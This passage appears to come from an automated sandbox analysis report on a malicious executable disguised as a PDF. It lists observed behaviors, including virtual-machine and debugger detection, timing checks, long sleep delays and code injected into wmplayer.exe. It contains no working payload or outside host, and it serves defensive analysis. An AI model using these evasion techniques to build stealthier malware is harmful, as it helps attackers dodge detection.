          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

          Malware Analysis System Evasion

          barindex
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeAPI/Special instruction interceptor: Address: 7FFB2CECD324
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeAPI/Special instruction interceptor: Address: 7FFB2CED0774
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeAPI/Special instruction interceptor: Address: 7FFB2CED0154
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeAPI/Special instruction interceptor: Address: 7FFB2CECD8A4
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeAPI/Special instruction interceptor: Address: 7FFB2CECDA44
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeAPI/Special instruction interceptor: Address: 7FFB2CECD1E4
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeRDTSC instruction interceptor: First address: 409904 second address: 40990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeRDTSC instruction interceptor: First address: 409B7E second address: 409B84 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\rundll32.exeRDTSC instruction interceptor: First address: 349904 second address: 34990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\rundll32.exeRDTSC instruction interceptor: First address: 349B7E second address: 349B84 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\Specification and Quantity Pdf.exeMemory allocated: 26984690000 memory reserve | memory write watchJump to behavior
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_00409AB0 rdtsc 6_2_00409AB0
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4583Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5240Jump to behavior
          Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 730Jump to behavior
          Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 9215Jump to behavior
          Source: C:\Windows\explorer.exeWindow / User API: foregroundWindowGot 889Jump to behavior
          Source: C:\Windows\explorer.exeWindow / User API: foregroundWindowGot 866Jump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exeWindow / User API: threadDelayed 1456Jump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exeWindow / User API: threadDelayed 8511Jump to behavior
          Source: C:\Windows\explorer.exeDecision node followed by non-executed suspicious API: DecisionNode, Non Executed (send or recv or WinExec)
          Source: C:\Users\user\Desktop\Specification and Quantity Pdf.exeEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodesgraph_0-29707
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeAPI coverage: 2.3 %
          Source: C:\Windows\SysWOW64\rundll32.exeAPI coverage: 2.7 %
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8016Thread sleep time: -6456360425798339s >= -30000sJump to behavior
          Source: C:\Windows\explorer.exe TID: 5260Thread sleep count: 730 > 30Jump to behavior
          Source: C:\Windows\explorer.exe TID: 5260Thread sleep time: -1460000s >= -30000sJump to behavior
          Source: C:\Windows\explorer.exe TID: 5260Thread sleep count: 9215 > 30Jump to behavior
          Source: C:\Windows\explorer.exe TID: 5260Thread sleep time: -18430000s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exe TID: 8180Thread sleep time: -2912000s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exe TID: 8180Thread sleep time: -17022000s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exeLast function: Thread delayed
          Source: C:\Users\user\Desktop\Specification and Quantity Pdf.exeCode function: 0_2_00007FF773C61460 GetSystemInfo,GetNumaHighestNodeNumber,GetCurrentProcess,GetProcessGroupAffinity,GetLastError,GetCurrentProcess,GetProcessAffinityMask,0_2_00007FF773C61460
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: explorer.exe, 00000008.00000002.3749514616.0000000000C74000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000I
          Source: explorer.exe, 00000008.00000002.3752127425.000000000326A000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware, Inc.
          Source: explorer.exe, 00000008.00000003.3081808656.0000000008DFE000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: BBSCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000
          Source: explorer.exe, 00000008.00000002.3757784608.0000000008F4D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000000.1323539837.0000000008F4D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3081808656.0000000008F4D000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
          Source: explorer.exe, 00000008.00000002.3752127425.000000000326A000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware, Inc.NoneVMware-42 27 88 19 56 cc 59 1a-97 79 fb 8c bf a1 e2 9dVMware20,1
          Source: explorer.exe, 00000008.00000002.3752127425.000000000326A000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware, Inc.VMW201.00V.20829224.B64.221121184211/21/2022
          Source: explorer.exe, 00000008.00000002.3752127425.000000000326A000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware SVGA II
          Source: explorer.exe, 00000008.00000003.2275911834.0000000007314000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: War&Prod_VMware_xU1
          Source: Specification and Quantity Pdf.exe, 00000000.00000002.1308793083.0000026984514000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\8b}\
          Source: explorer.exe, 00000008.00000003.3081808656.0000000008DFE000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}e
          Source: Specification and Quantity Pdf.exe, 00000000.00000002.1308793083.0000026984514000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000008.00000003.3081808656.0000000008F4D000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000I}~"
          Source: explorer.exe, 00000008.00000000.1323539837.0000000009052000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000}io
          Source: explorer.exe, 00000008.00000003.3081808656.0000000008F4D000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware SATA CD00
          Source: explorer.exe, 00000008.00000002.3757784608.0000000008DFE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000000.1323539837.0000000008DFE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3081808656.0000000008DFE000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWystem32\DriverStore\en-US\machine.inf_loc5
          Source: explorer.exe, 00000008.00000002.3752127425.000000000326A000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware20,1
          Source: explorer.exe, 00000008.00000002.3752127425.000000000326A000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware Virtual RAM00000001VMW-4096MBRAM slot #0RAM slot #0
          Source: explorer.exe, 00000008.00000003.3081808656.0000000008DFE000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMWare
          Source: explorer.exe, 00000008.00000000.1323539837.0000000009052000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000'
          Source: explorer.exe, 00000008.00000003.2275911834.0000000007314000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: War&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
          Source: explorer.exe, 00000008.00000000.1323539837.0000000008F27000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3081808656.0000000008F27000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3757784608.0000000008F27000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWT`
          Source: explorer.exe, 00000008.00000002.3752127425.000000000326A000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware SVGA IIES1371
          Source: explorer.exe, 00000008.00000002.3752127425.000000000326A000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware Virtual RAM
          Source: explorer.exe, 00000008.00000002.3752127425.000000000326A000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware-42 27 88 19 56 cc 59 1a-97 79 fb 8c bf a1 e2 9d
          Source: explorer.exe, 00000008.00000002.3749514616.0000000000C74000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000
          Source: explorer.exe, 00000008.00000003.3081808656.0000000008DFE000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000008.00000002.3749514616.0000000000C74000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeProcess queried: DebugPortJump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exeProcess queried: DebugPortJump to behavior
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_00409AB0 rdtsc 6_2_00409AB0
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_0040ACF0 LdrLoadDll,6_2_0040ACF0
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00E925B2 GetCurrentThreadId,IsDebuggerPresent,OutputDebugStringW,10_2_00E925B2
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_0382E388 mov eax, dword ptr fs:[00000030h]6_2_0382E388
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_0382E388 mov eax, dword ptr fs:[00000030h]6_2_0382E388
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_0382E388 mov eax, dword ptr fs:[00000030h]6_2_0382E388
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_0385438F mov eax, dword ptr fs:[00000030h]6_2_0385438F
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_0385438F mov eax, dword ptr fs:[00000030h]6_2_0385438F
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_0390539D mov eax, dword ptr fs:[00000030h]6_2_0390539D
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_0388739A mov eax, dword ptr fs:[00000030h]6_2_0388739A
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_0388739A mov eax, dword ptr fs:[00000030h]6_2_0388739A
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_03828397 mov eax, dword ptr fs:[00000030h]6_2_03828397
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_03828397 mov eax, dword ptr fs:[00000030h]6_2_03828397
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_03828397 mov eax, dword ptr fs:[00000030h]6_2_03828397
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_038533A5 mov eax, dword ptr fs:[00000030h]6_2_038533A5
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_038633A0 mov eax, dword ptr fs:[00000030h]6_2_038633A0
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_038633A0 mov eax, dword ptr fs:[00000030h]6_2_038633A0
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_038EC3CD mov eax, dword ptr fs:[00000030h]6_2_038EC3CD
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_0383A3C0 mov eax, dword ptr fs:[00000030h]6_2_0383A3C0
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_0383A3C0 mov eax, dword ptr fs:[00000030h]6_2_0383A3C0
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_0383A3C0 mov eax, dword ptr fs:[00000030h]6_2_0383A3C0
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_0383A3C0 mov eax, dword ptr fs:[00000030h]6_2_0383A3C0
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_0383A3C0 mov eax, dword ptr fs:[00000030h]6_2_0383A3C0
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_0383A3C0 mov eax, dword ptr fs:[00000030h]6_2_0383A3C0
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_038383C0 mov eax, dword ptr fs:[00000030h]6_2_038383C0
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_038383C0 mov eax, dword ptr fs:[00000030h]6_2_038383C0
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_038383C0 mov eax, dword ptr fs:[00000030h]6_2_038383C0
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_038383C0 mov eax, dword ptr fs:[00000030h]6_2_038383C0
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_038EB3D0 mov ecx, dword ptr fs:[00000030h]6_2_038EB3D0
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_038EF3E6 mov eax, dword ptr fs:[00000030h]6_2_038EF3E6
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_039053FC mov eax, dword ptr fs:[00000030h]6_2_039053FC
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_038403E9 mov eax, dword ptr fs:[00000030h]6_2_038403E9
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_038403E9 mov eax, dword ptr fs:[00000030h]6_2_038403E9
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_038403E9 mov eax, dword ptr fs:[00000030h]6_2_038403E9
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_038403E9 mov eax, dword ptr fs:[00000030h]6_2_038403E9
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_038403E9 mov eax, dword ptr fs:[00000030h]6_2_038403E9
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_038403E9 mov eax, dword ptr fs:[00000030h]6_2_038403E9
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_038403E9 mov eax, dword ptr fs:[00000030h]6_2_038403E9
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_038403E9 mov eax, dword ptr fs:[00000030h]6_2_038403E9
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_0384E3F0 mov eax, dword ptr fs:[00000030h]6_2_0384E3F0
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_0384E3F0 mov eax, dword ptr fs:[00000030h]6_2_0384E3F0
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_0384E3F0 mov eax, dword ptr fs:[00000030h]6_2_0384E3F0
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_038663FF mov eax, dword ptr fs:[00000030h]6_2_038663FF
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_038B930B mov eax, dword ptr fs:[00000030h]6_2_038B930B
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_038B930B mov eax, dword ptr fs:[00000030h]6_2_038B930B
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_038B930B mov eax, dword ptr fs:[00000030h]6_2_038B930B
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_0386A30B mov eax, dword ptr fs:[00000030h]6_2_0386A30B
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_0386A30B mov eax, dword ptr fs:[00000030h]6_2_0386A30B
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_0386A30B mov eax, dword ptr fs:[00000030h]6_2_0386A30B
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_0382C310 mov ecx, dword ptr fs:[00000030h]6_2_0382C310
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_03850310 mov ecx, dword ptr fs:[00000030h]6_2_03850310
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_038F132D mov eax, dword ptr fs:[00000030h]6_2_038F132D
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_038F132D mov eax, dword ptr fs:[00000030h]6_2_038F132D
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_0385F32A mov eax, dword ptr fs:[00000030h]6_2_0385F32A
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_03827330 mov eax, dword ptr fs:[00000030h]6_2_03827330
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_038B2349 mov eax, dword ptr fs:[00000030h]6_2_038B2349
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_038B2349 mov eax, dword ptr fs:[00000030h]6_2_038B2349
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_038B2349 mov eax, dword ptr fs:[00000030h]6_2_038B2349
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_038B2349 mov eax, dword ptr fs:[00000030h]6_2_038B2349
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_038B2349 mov eax, dword ptr fs:[00000030h]6_2_038B2349
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_038B2349 mov eax, dword ptr fs:[00000030h]6_2_038B2349
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_038B2349 mov eax, dword ptr fs:[00000030h]6_2_038B2349
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_038B2349 mov eax, dword ptr fs:[00000030h]6_2_038B2349
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_038B2349 mov eax, dword ptr fs:[00000030h]6_2_038B2349
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_038B2349 mov eax, dword ptr fs:[00000030h]6_2_038B2349
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_038B2349 mov eax, dword ptr fs:[00000030h]6_2_038B2349
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_038B2349 mov eax, dword ptr fs:[00000030h]6_2_038B2349
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_038B2349 mov eax, dword ptr fs:[00000030h]6_2_038B2349
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_038B2349 mov eax, dword ptr fs:[00000030h]6_2_038B2349
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_038B2349 mov eax, dword ptr fs:[00000030h]6_2_038B2349
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_0382D34C mov eax, dword ptr fs:[00000030h]6_2_0382D34C
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_0382D34C mov eax, dword ptr fs:[00000030h]6_2_0382D34C
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_03905341 mov eax, dword ptr fs:[00000030h]6_2_03905341
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_03829353 mov eax, dword ptr fs:[00000030h]6_2_03829353
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_03829353 mov eax, dword ptr fs:[00000030h]6_2_03829353
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_038B035C mov eax, dword ptr fs:[00000030h]6_2_038B035C
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_038B035C mov eax, dword ptr fs:[00000030h]6_2_038B035C
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_038B035C mov eax, dword ptr fs:[00000030h]6_2_038B035C
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_038B035C mov ecx, dword ptr fs:[00000030h]6_2_038B035C
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_038B035C mov eax, dword ptr fs:[00000030h]6_2_038B035C
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_038B035C mov eax, dword ptr fs:[00000030h]6_2_038B035C
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_038FA352 mov eax, dword ptr fs:[00000030h]6_2_038FA352
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_038EF367 mov eax, dword ptr fs:[00000030h]6_2_038EF367
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_038D437C mov eax, dword ptr fs:[00000030h]6_2_038D437C
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_03837370 mov eax, dword ptr fs:[00000030h]6_2_03837370
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_03837370 mov eax, dword ptr fs:[00000030h]6_2_03837370
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_03837370 mov eax, dword ptr fs:[00000030h]6_2_03837370
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_0386E284 mov eax, dword ptr fs:[00000030h]6_2_0386E284
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_0386E284 mov eax, dword ptr fs:[00000030h]6_2_0386E284
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_038B0283 mov eax, dword ptr fs:[00000030h]6_2_038B0283
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_038B0283 mov eax, dword ptr fs:[00000030h]6_2_038B0283
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_038B0283 mov eax, dword ptr fs:[00000030h]6_2_038B0283
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_03905283 mov eax, dword ptr fs:[00000030h]6_2_03905283
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_0386329E mov eax, dword ptr fs:[00000030h]6_2_0386329E
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_0386329E mov eax, dword ptr fs:[00000030h]6_2_0386329E
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_038402A0 mov eax, dword ptr fs:[00000030h]6_2_038402A0
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_038402A0 mov eax, dword ptr fs:[00000030h]6_2_038402A0
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_038452A0 mov eax, dword ptr fs:[00000030h]6_2_038452A0
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_038452A0 mov eax, dword ptr fs:[00000030h]6_2_038452A0
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_038452A0 mov eax, dword ptr fs:[00000030h]6_2_038452A0
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_038452A0 mov eax, dword ptr fs:[00000030h]6_2_038452A0
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_038F92A6 mov eax, dword ptr fs:[00000030h]6_2_038F92A6
